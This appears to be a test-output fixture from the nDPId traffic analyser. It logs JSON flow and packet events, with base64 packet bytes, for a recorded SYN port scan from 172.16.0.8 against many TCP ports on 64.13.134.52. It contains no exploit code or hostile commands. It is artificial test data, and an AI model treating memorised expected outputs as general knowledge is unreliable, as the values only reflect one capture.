-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLkAAC0G3rmsEAAIQA2GNIzSD57dUoMYAAAAAGACCAAg8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIoAADQGV+isEAAIQA2GNIzSB9bdUoMYAAAAAGACBAAsuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAso+IAADgGbJCsEAAIQA2GNIzSBDjdUoMYAAAAAGACBAAwVwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0IAACwGHTCsEAAIQA2GNIzSF3bdUoMYAAAAAGACBAAdGQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsVSwAADEGwkasEAAIQA2GNIzSC73dUoMYAAAAAGACCAAk0gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrsAADsGjresEAAIQA2GNIzSFgHdUoMYAAAAAGACEAASjgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MMAACkGQq+sEAAIQA2GNIzSHOrdUoMYAAAAAGACCAATpQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAslgAAAC4GhHKsEAAIQA2GNIzSEOHdUoMYAAAAAGACDAAbrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsAEUAADYGEi6sEAAIQA2GNIzTFuPdU4MZAAAAAGACDAAVqQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsKngAACUG+PqsEAAIQA2GNIzTACHdU4MZAAAAAGACCAAwawAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAswesAADIGVIesEAAIQA2GNIzTApzdU4MZAAAAAGACDAAp8AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6EAADgGoNGsEAAIQA2GNIzTSizdU4MZAAAAAGACBADqXwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsT8MAACoGzq+sEAAIQA2GNIzTBL3dU4MZAAAAAGACDAAnzwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsp3EAADEGcAGsEAAIQA2GNIzTCDndU4MZAAAAAGACCAAoUwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsVcwAACoGyKasEAAIQA2GNIzTIyjdU4MZAAAAAGACDAAJZAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsoF8AADMGdROsEAAIQA2GNIzTAKHdU4MZAAAAAGACEAAn6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgcAADcG72usEAAIQA2GNIzTJT\/dU4MZAAAAAGACEAADTQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsK00AACcG9iWsEAAIQA2GNIzTw1PdU4MZAAAAAGACEABlOAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAscdYAADoGnJysEAAIQA2GNIzTB9DdU4MZAAAAAGACDAAkvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAskloAADsGexisEAAIQA2GNIzTDPzdU4MZAAAAAGACEAAbkAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsQgQAACwG2m6sEAAIQA2GNIzTBELdU4MZAAAAAGACBAAwSgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAslhYAADkGeVysEAAIQA2GNIzTID7dU4MZAAAAAGACCAAQTgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsJNMAACgG+5+sEAAIQA2GNIzTwAfdU4MZAAAAAGACBAB0hAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsuDsAACYGajesEAAIQA2GNIzTBtvdU4MZAAAAAGACDAAlsQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 